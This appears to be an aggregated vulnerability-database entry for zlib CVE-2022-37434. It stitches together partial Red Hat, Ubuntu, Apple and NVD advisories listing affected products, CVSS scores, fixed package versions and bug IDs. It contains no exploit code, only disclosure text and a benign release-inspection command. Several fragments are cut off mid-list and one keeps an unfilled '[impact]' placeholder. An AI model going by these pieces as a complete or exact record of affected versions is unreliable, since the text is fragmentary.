golang: archive/tar: unbounded memory consumption when reading headers (CVE-2022-2879, CVE-2022-2880, CVE-2022-41715)
-
jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)
-
jackson-databind: use of deeply nested arrays (CVE-2022-42004)
-
loader-utils: Regular expression denial of service (CVE-2022-37603)
-
golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service (CVE-2022-32189)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):
2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects
2113814 - CVE-2022-32189 golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service
2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY
2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers
2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters
2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps
2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS
2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays
2140597 - CVE-2022-37603 loader-utils: Regular expression denial of service
- JIRA issues fixed (https://issues.jboss.org/):
LOG-2860 - Error on LokiStack Components when forwarding logs to Loki on proxy cluster LOG-3131 - vector: kube API server certificate validation failure due to hostname mismatch LOG-3222 - [release-5.5] fluentd plugin for kafka ca-bundle secret doesn't support multiple CAs LOG-3226 - FluentdQueueLengthIncreasing rule failing to be evaluated. LOG-3284 - [release-5.5][Vector] logs parsed into structured when json is set without structured types. LOG-3287 - [release-5.5] Increase value of cluster-logging PriorityClass to move closer to system-cluster-critical value LOG-3301 - [release-5.5][ClusterLogging] elasticsearchStatus in ClusterLogging instance CR is not updated when Elasticsearch status is changed LOG-3305 - [release-5.5] Kibana Authentication Exception cookie issue LOG-3310 - [release-5.5] Can't choose correct CA ConfigMap Key when creating lokistack in Console LOG-3332 - [release-5.5] Reconcile error on controller when creating LokiStack with tls config
==========================================================================
Ubuntu Security Notice USN-6736-1
April 16, 2024
klibc vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 23.10
- Ubuntu 22.04 LTS
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)
Summary:
Several security issues were fixed in klibc.
Software Description:
- klibc: small utilities built with klibc for early boot
Details:
It was discovered that zlib, vendored in klibc, incorrectly handled pointer arithmetic. An attacker could use this issue to cause klibc to crash or to possibly execute arbitrary code. (CVE-2016-9840, CVE-2016-9841)
Danilo Ramos discovered that zlib, vendored in klibc, incorrectly handled memory when performing certain deflating operations. An attacker could use this issue to cause klibc to crash or to possibly execute arbitrary code. (CVE-2018-25032)
Evgeny Legerov discovered that zlib, vendored in klibc, incorrectly handled memory when performing certain inflate operations. An attacker could use this issue to cause klibc to crash or to possibly execute arbitrary code. (CVE-2022-37434)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 23.10:
  klibc-utils 2.0.13-1ubuntu0.1
  libklibc 2.0.13-1ubuntu0.1

Ubuntu 22.04 LTS:
  klibc-utils 2.0.10-4ubuntu0.1
  libklibc 2.0.10-4ubuntu0.1

Ubuntu 20.04 LTS:
  klibc-utils 2.0.7-1ubuntu5.2
  libklibc 2.0.7-1ubuntu5.2

Ubuntu 18.04 LTS (Available with Ubuntu Pro):
  klibc-utils 2.0.4-9ubuntu2.2+esm1
  libklibc 2.0.4-9ubuntu2.2+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):
  klibc-utils 2.0.4-8ubuntu1.16.04.4+esm2
  libklibc 2.0.4-8ubuntu1.16.04.4+esm2

Ubuntu 14.04 LTS (Available with Ubuntu Pro):
  klibc-utils 2.0.3-0ubuntu1.14.04.3+esm3
  libklibc 2.0.3-0ubuntu1.14.04.3+esm3
In general, a standard system update will make all the necessary changes.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.11.45 bug fix and security update
Advisory ID:       RHSA-2023:4053-01
Product:           Red Hat OpenShift Enterprise
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4053
Issue date:        2023-07-19
CVE Names:         CVE-2019-17594 CVE-2019-17595 CVE-2019-18218
                   CVE-2019-20838 CVE-2020-14155 CVE-2020-24370
                   CVE-2020-35525 CVE-2020-35527 CVE-2021-3580
                   CVE-2021-3634 CVE-2021-20231 CVE-2021-20232
                   CVE-2021-23177 CVE-2021-31566 CVE-2021-36084
                   CVE-2021-36085 CVE-2021-36086 CVE-2021-36087
                   CVE-2021-40528 CVE-2022-1271 CVE-2022-1586
                   CVE-2022-1785 CVE-2022-1897 CVE-2022-1927
                   CVE-2022-4304 CVE-2022-4450 CVE-2022-21235
                   CVE-2022-24407 CVE-2022-29824 CVE-2022-34903
                   CVE-2022-37434 CVE-2022-38177 CVE-2022-38178
                   CVE-2022-40674 CVE-2022-42010 CVE-2022-42011
                   CVE-2022-42012 CVE-2022-42898 CVE-2022-47629
                   CVE-2023-0215 CVE-2023-0361 CVE-2023-1281
                   CVE-2023-24329 CVE-2023-32233
=====================================================================
- Summary:
Red Hat OpenShift Container Platform release 4.11.45 is now available with updates to packages and images that fix several bugs and add enhancements.
This release includes a security update for Red Hat OpenShift Container Platform 4.11.
Red Hat Product Security has rated this update as having a security impact of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.45. See the following advisory for the RPM packages for this release:
https://access.redhat.com/errata/RHBA-2023:4052
Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html
Security Fix(es):
- github.com/Masterminds/vcs: Command Injection via argument injection (CVE-2022-21235)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
All OpenShift Container Platform 4.11 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html
- Solution:
For OpenShift Container Platform 4.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html
You may download the oc tool and use it to inspect release image metadata for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests may be found at https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.
The sha values for the release are
(For x86_64 architecture) The image digest is sha256:c6771b12bd873c0e3e5fbc7afa600d92079de6534dcb52f09cb1d22ee49608a9
(For s390x architecture) The image digest is sha256:622b5361f95d1d512ea84f363ac06155cbb9ee28e85ccaae1acd80b98b660fa8
(For ppc64le architecture) The image digest is sha256:50c131cf85dfb00f258af350a46b85eff8fb8084d3e1617520cd69b59caeaff7
(For aarch64 architecture) The image digest is sha256:9e575c4ece9caaf31acbef246ccad71959cd5bf634e7cb284b0849ddfa205ad7
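The inspection step described above can be sketched as a short shell snippet. This is a minimal sketch, not part of the advisory itself: it uses the x86_64 digest listed above and assumes the oc tool is already installed and has network access to quay.io.

```shell
# x86_64 release image digest taken from this advisory.
DIGEST="sha256:c6771b12bd873c0e3e5fbc7afa600d92079de6534dcb52f09cb1d22ee49608a9"

# Sanity-check that the digest is a well-formed sha256 reference.
echo "${DIGEST}" | grep -Eq '^sha256:[0-9a-f]{64}$' && echo "digest format OK"

# Inspect the release image metadata (requires the oc CLI and network access).
if command -v oc >/dev/null 2>&1; then
  oc adm release info "quay.io/openshift-release-dev/ocp-release@${DIGEST}" \
    || echo "oc adm release info failed (network access required)"
fi
```

The same pattern applies to the s390x, ppc64le, and aarch64 digests listed above.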
All OpenShift Container Platform 4.11 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html
- Bugs fixed (https://bugzilla.redhat.com/):
2215317 - CVE-2022-21235 github.com/Masterminds/vcs: Command Injection via argument injection
- JIRA issues fixed (https://issues.redhat.com/):
OCPBUGS-15446 - (release-4.11) gather "gateway-mode-config" config map from "openshift-network-operator" namespace
OCPBUGS-15532 - visiting Configurations page returns error Cannot read properties of undefined (reading 'apiGroup')
OCPBUGS-15645 - Can't use git lfs in BuildConfig git source with strategy Docker
OCPBUGS-15739 - Environment cannot find Python
OCPBUGS-15758 - [release-4.11] Bump Jenkins and Jenkins Agent Base image versions
OCPBUGS-15942 - 9% of OKD tests failing on error: tag latest failed: Internal error occurred: registry.centos.org/dotnet/dotnet-31-centos7:latest: Get "https://registry.centos.org/v2/": dial tcp: lookup registry.centos.org on 172.30.0.10:53: no such host
OCPBUGS-15966 - [4.12] MetalLB contains incorrect data Correct and incorrect MetalLB resources coexist should have correct statuses
- References:
https://access.redhat.com/security/cve/CVE-2019-17594
https://access.redhat.com/security/cve/CVE-2019-17595
https://access.redhat.com/security/cve/CVE-2019-18218
https://access.redhat.com/security/cve/CVE-2019-20838
https://access.redhat.com/security/cve/CVE-2020-14155
https://access.redhat.com/security/cve/CVE-2020-24370
https://access.redhat.com/security/cve/CVE-2020-35525
https://access.redhat.com/security/cve/CVE-2020-35527
https://access.redhat.com/security/cve/CVE-2021-3580
https://access.redhat.com/security/cve/CVE-2021-3634
https://access.redhat.com/security/cve/CVE-2021-20231
https://access.redhat.com/security/cve/CVE-2021-20232
https://access.redhat.com/security/cve/CVE-2021-23177
https://access.redhat.com/security/cve/CVE-2021-31566
https://access.redhat.com/security/cve/CVE-2021-36084
https://access.redhat.com/security/cve/CVE-2021-36085
https://access.redhat.com/security/cve/CVE-2021-36086
https://access.redhat.com/security/cve/CVE-2021-36087
https://access.redhat.com/security/cve/CVE-2021-40528
https://access.redhat.com/security/cve/CVE-2022-1271
https://access.redhat.com/security/cve/CVE-2022-1586
https://access.redhat.com/security/cve/CVE-2022-1785
https://access.redhat.com/security/cve/CVE-2022-1897
https://access.redhat.com/security/cve/CVE-2022-1927
https://access.redhat.com/security/cve/CVE-2022-4304
https://access.redhat.com/security/cve/CVE-2022-4450
https://access.redhat.com/security/cve/CVE-2022-21235
https://access.redhat.com/security/cve/CVE-2022-24407
https://access.redhat.com/security/cve/CVE-2022-29824
https://access.redhat.com/security/cve/CVE-2022-34903
https://access.redhat.com/security/cve/CVE-2022-37434
https://access.redhat.com/security/cve/CVE-2022-38177
https://access.redhat.com/security/cve/CVE-2022-38178
https://access.redhat.com/security/cve/CVE-2022-40674
https://access.redhat.com/security/cve/CVE-2022-42010
https://access.redhat.com/security/cve/CVE-2022-42011
https://access.redhat.com/security/cve/CVE-2022-42012
https://access.redhat.com/security/cve/CVE-2022-42898
https://access.redhat.com/security/cve/CVE-2022-47629
https://access.redhat.com/security/cve/CVE-2023-0215
https://access.redhat.com/security/cve/CVE-2023-0361
https://access.redhat.com/security/cve/CVE-2023-1281
https://access.redhat.com/security/cve/CVE-2023-24329
https://access.redhat.com/security/cve/CVE-2023-32233
https://access.redhat.com/security/updates/classification/#important
https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2023 Red Hat, Inc.
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "network security",
"scope": "gte",
"trust": 1.0,
"vendor": "stormshield",
"version": "4.6.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "hci",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "storagegrid",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "oncommand workflow automation",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "37"
},
{
"_id": null,
"model": "zlib",
"scope": "lte",
"trust": 1.0,
"vendor": "zlib",
"version": "1.2.12"
},
{
"_id": null,
"model": "iphone os",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "16.0"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "11.7.1"
},
{
"_id": null,
"model": "network security",
"scope": "lt",
"trust": 1.0,
"vendor": "stormshield",
"version": "3.7.34"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "35"
},
{
"_id": null,
"model": "management services for element software",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "network security",
"scope": "gte",
"trust": 1.0,
"vendor": "stormshield",
"version": "3.7.31"
},
{
"_id": null,
"model": "iphone os",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.7.1"
},
{
"_id": null,
"model": "network security",
"scope": "lt",
"trust": 1.0,
"vendor": "stormshield",
"version": "3.11.22"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "network security",
"scope": "lt",
"trust": 1.0,
"vendor": "stormshield",
"version": "4.6.3"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.6.1"
},
{
"_id": null,
"model": "network security",
"scope": "lt",
"trust": 1.0,
"vendor": "stormshield",
"version": "4.3.16"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "36"
},
{
"_id": null,
"model": "network security",
"scope": "gte",
"trust": 1.0,
"vendor": "stormshield",
"version": "4.3.0"
},
{
"_id": null,
"model": "network security",
"scope": "gte",
"trust": 1.0,
"vendor": "stormshield",
"version": "3.11.0"
},
{
"_id": null,
"model": "hci compute node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "11.0"
},
{
"_id": null,
"model": "ontap select deploy administration utility",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ipados",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.7.1"
},
{
"_id": null,
"model": "iphone os",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "16.1"
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "12.0.0"
},
{
"_id": null,
"model": "watchos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "9.1"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-37434"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "170210"
},
{
"db": "PACKETSTORM",
"id": "169810"
},
{
"db": "PACKETSTORM",
"id": "170242"
},
{
"db": "PACKETSTORM",
"id": "169692"
},
{
"db": "PACKETSTORM",
"id": "169696"
},
{
"db": "PACKETSTORM",
"id": "170162"
},
{
"db": "PACKETSTORM",
"id": "173605"
}
],
"trust": 0.7
},
"cve": "CVE-2022-37434",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2022-37434",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-37434",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-37434",
"trust": 1.0,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-37434"
},
{
"db": "NVD",
"id": "CVE-2022-37434"
}
]
},
"description": {
"_id": null,
"data": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference). \n\nFor the stable distribution (bullseye), this problem has been fixed in\nversion 1:1.2.11.dfsg-2+deb11u2. \n\nWe recommend that you upgrade your zlib packages. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2022-10-27-12 Additional information for APPLE-SA-2022-10-24-5 watchOS 9.1\n\nwatchOS 9.1 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT213491. \n\nAppleMobileFileIntegrity\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to modify protected parts of the file\nsystem\nDescription: This issue was addressed by removing additional\nentitlements. \nCVE-2022-42825: Mickey Jin (@patch1t)\n\nApple Neural Engine\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges \nDescription: The issue was addressed with improved memory handling. \nCVE-2022-32932: Mohamed Ghannam (@_simo36)\nEntry added October 27, 2022\n\nAudio\nAvailable for: Apple Watch Series 4 and later\nImpact: Parsing a maliciously crafted audio file may lead to\ndisclosure of user information \nDescription: The issue was addressed with improved memory handling. \nCVE-2022-42798: Anonymous working with Trend Micro Zero Day\nInitiative\nEntry added October 27, 2022\n\nAVEVideoEncoder\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: The issue was addressed with improved bounds checks. \nCVE-2022-32940: ABC Research s.r.o. 
\n\nCFNetwork\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing a maliciously crafted certificate may lead to\narbitrary code execution\nDescription: A certificate validation issue existed in the handling\nof WKWebView. This issue was addressed with improved validation. \nCVE-2022-42813: Jonathan Zhang of Open Computing Facility\n(ocf.berkeley.edu)\n\nGPU Drivers\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: The issue was addressed with improved memory handling. \nCVE-2022-32947: Asahi Lina (@LinaAsahi)\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: The issue was addressed with improved memory handling. \nCVE-2022-32924: Ian Beer of Google Project Zero\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: A remote user may be able to cause kernel code execution\nDescription: An out-of-bounds write issue was addressed with improved\nbounds checking. \nCVE-2022-42808: Zweig of Kunlun Lab\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2022-32944: Tim Michaud (@TimGMichaud) of Moveworks.ai\nEntry added October 27, 2022\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges \nDescription: A race condition was addressed with improved locking. \nCVE-2022-42803: Xinru Chi of Pangu Lab, John Aakerblom (@jaakerblom)\nEntry added October 27, 2022\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: An app with root privileges may be able to execute arbitrary\ncode with kernel privileges \nDescription: The issue was addressed with improved bounds checks. 
\nCVE-2022-32926: Tim Michaud (@TimGMichaud) of Moveworks.ai\nEntry added October 27, 2022\n\nKernel\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges \nDescription: A logic issue was addressed with improved checks. \nCVE-2022-42801: Ian Beer of Google Project Zero\nEntry added October 27, 2022\n\nSafari\nAvailable for: Apple Watch Series 4 and later\nImpact: Visiting a maliciously crafted website may leak sensitive\ndata \nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2022-42817: Mir Masood Ali, PhD student, University of Illinois\nat Chicago; Binoy Chitale, MS student, Stony Brook University;\nMohammad Ghasemisharif, PhD Candidate, University of Illinois at\nChicago; Chris Kanich, Associate Professor, University of Illinois at\nChicago\nEntry added October 27, 2022\n\nSandbox\nAvailable for: Apple Watch Series 4 and later\nImpact: An app may be able to access user-sensitive data\nDescription: An access issue was addressed with additional sandbox\nrestrictions. \nCVE-2022-42811: Justin Bui (@slyd0g) of Snowflake\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Visiting a malicious website may lead to user interface\nspoofing\nDescription: The issue was addressed with improved UI handling. \nWebKit Bugzilla: 243693\nCVE-2022-42799: Jihwan Kim (@gPayl0ad), Dohyun Lee (@l33d0hyun)\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A type confusion issue was addressed with improved\nmemory handling. \nWebKit Bugzilla: 244622\nCVE-2022-42823: Dohyun Lee (@l33d0hyun) of SSD Labs\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may disclose\nsensitive user information\nDescription: A logic issue was addressed with improved state\nmanagement. 
\nWebKit Bugzilla: 245058\nCVE-2022-42824: Abdulrahman Alqabandi of Microsoft Browser\nVulnerability Research, Ryan Shin of IAAI SecLab at Korea University,\nDohyun Lee (@l33d0hyun) of DNSLab at Korea University\n\nWebKit\nAvailable for: Apple Watch Series 4 and later\nImpact: Processing maliciously crafted web content may disclose\ninternal states of the app \nDescription: A correctness issue in the JIT was addressed with\nimproved checks. \nWebKit Bugzilla: 242964\nCVE-2022-32923: Wonyoung Jung (@nonetype_pwn) of KAIST Hacking Lab\nEntry added October 27, 2022\n\nzlib\nAvailable for: Apple Watch Series 4 and later\nImpact: A user may be able to cause unexpected app termination or\narbitrary code execution \nDescription: This issue was addressed with improved checks. \nCVE-2022-37434: Evgeny Legerov\nCVE-2022-42800: Evgeny Legerov\nEntry added October 27, 2022\n\nAdditional recognition\n\niCloud\nWe would like to acknowledge Tim Michaud (@TimGMichaud) of\nMoveworks.ai for their assistance. \n\nKernel\nWe would like to acknowledge Peter Nguyen of STAR Labs, Tim Michaud\n(@TimGMichaud) of Moveworks.ai, Tommy Muir (@Muirey03) for their\nassistance. \n\nWebKit\nWe would like to acknowledge Maddie Stone of Google Project Zero,\nNarendra Bhati (@imnarendrabhati) of Suma Soft Pvt. Ltd., an\nanonymous researcher for their assistance. \n\nInstructions on how to update your Apple Watch software are available\nat https://support.apple.com/kb/HT204641 To check the version on\nyour Apple Watch, open the Apple Watch app on your iPhone and select\n\"My Watch \u003e General \u003e About\". Alternatively, on your watch, select\n\"My Watch \u003e General \u003e About\". \nAll information is also posted on the Apple Security Updates\nweb site: https://support.apple.com/en-us/HT201222. 
\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmNbKpQACgkQ4RjMIDke\nNxndmQ/9FlBich1M+naXLmjo/AyBTdlmBdFUH6cU92PspO7vrzTZl3Gl3dSjvGg0\nTU7AGeAAvr278Zra0Hrm+D+w2BMAd3SSIjBXyum02lx0AGyyAFaPEDVq4CpxnqUG\nAEqBRrgoU9yZpTrIQXZlsnqphdv3KLVDzqqKlZjkPzIboYJ0I0c0HMP54618kx1n\noBtoEEjPrIhH9LJyt37FbtgRntCzuuyistaxKGugZo4UDUt8hkHLKpYHf/5BNfWl\n/SaX1sy1ZJBoOezMC7/egaHPBbJRDnU3dXSQ7ON7h6w1Tc9NeUjXP0wf8BByeIko\nzJF5StfqfBKa3fR8wl0uM4CWDuHVtVjHAv5lWSqEQoEFoAjud+Ajjr5j3DJegVW7\nXp5Xu7W2XRR03dCM/SCQXMttr/Eu7z4EPJZD1W5y/UYH+ZwF4tq+4fxdrLOzPh4j\nuDLW+CWvF0d/+lVINDXzvzfQwEk77fbFJtUwL6Z5Sq95rtIL0/1OgtK/F/ODeyAX\n8xYDCVdbn84K0/5K58NsvLS01XKXGISVY5yWrf3R7f69AVq7aiaaREY71pkuIwKf\n+aGpuOJibybGZqIOedMES/FCYuUqZF/0N7TJH8LpmlYt/T+fXjeJkupdeT+2vpcX\niq3rTxsee+WgHhuR/3utIdIFZwVvgZBOadtHO6vIOQ1ce1QyLqI=\n=ZTUZ\n-----END PGP SIGNATURE-----\n\n\n. Description:\n\nThe rh-sso-7/sso76-openshift-rhel8 container image and\nrh-sso-7/sso7-rhel8-operator operator has been updated for RHEL-8 based\nMiddleware Containers to address the following security issues. Users of these images\nare also encouraged to rebuild all container images that depend on these\nimages. \n\nDockerfiles and scripts should be amended either to refer to this new image\nspecifically, or to the latest image generally. Bugs fixed (https://bugzilla.redhat.com/):\n\n2138971 - CVE-2022-3782 keycloak: path traversal via double URL encoding\n2141404 - CVE-2022-3916 keycloak: Session takeover with OIDC offline refreshtokens\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nCIAM-4412 - Build new OCP image for rh-sso-7/sso76-openshift-rhel8\nCIAM-4413 - Generate new operator bundle image for this patch\n\n6. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n2134010 - CVE-2022-32149 golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time to parse complex tags\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-2674 - Many `can\u0027t remove non-existent inotify watch for: /var/log/pods/xxxxxx` errors in logfilesmetricexporter container. \nLOG-3042 - Logging view plugin removes part of LogQL query\nLOG-3049 - [release-5.5] Resources associated with collector / fluentd keep on getting recreated\nLOG-3127 - The alerts are Fluentd when type=vector\nLOG-3138 - [release-5.5] the content of secret elasticsearch-metrics-token is recreated continually\nLOG-3175 - [release-5.5] Vector healthcheck fails when forwarding logs to Cloudwatch\nLOG-3213 - must-gather is empty for logging with CLO image\nLOG-3234 - [release-5.5] Loki gateway is crashing because cipher-suites are not set\nLOG-3251 - [release-5.5] Adding Valid Subscription Annotation\n\n6. Bugs fixed (https://bugzilla.redhat.com/):\n\n2129679 - clusters belong to global clusterset is not selected by placement when rescheduling\n2134609 - CVE-2022-3517 nodejs-minimatch: ReDoS via the braceExpand function\n2139085 - RHACM 2.6.3 images\n2149181 - CVE-2022-41912 crewjam/saml: Authentication bypass when processing SAML responses containing multiple Assertion elements\n\n5. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.4.8 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n2101669 - CVE-2022-2238 search-api: SQL injection leads to remote denial of service\n2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n2121068 - CVE-2022-35949 nodejs: undici.request vulnerable to SSRF\n2121101 - CVE-2022-35948 nodejs: undici vulnerable to CRLF via content headers\n2126277 - CVE-2022-25858 terser: insecure use of regular expressions leads to ReDoS\n2130745 - RHACM 2.4.8 images\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2042826 - [SNO] the replicas of ingresscontroller/default is 2 on new installed SNO private cluster\n2092839 - Downward API (annotations) is missing PCI information when using the tuning metaPlugin on SR-IOV Networks\n2092918 - CVE-2022-30321 go-getter: unsafe download (issue 1 of 3)\n2092923 - CVE-2022-30322 go-getter: unsafe download (issue 2 of 3)\n2092925 - CVE-2022-30323 go-getter: unsafe download (issue 3 of 3)\n2092928 - CVE-2022-26945 go-getter: command injection vulnerability\n2099800 - Bump to kubernetes 1.24.6\n2109487 - machine-controller is case sensitive which can lead to false/positive errors\n\n5. 
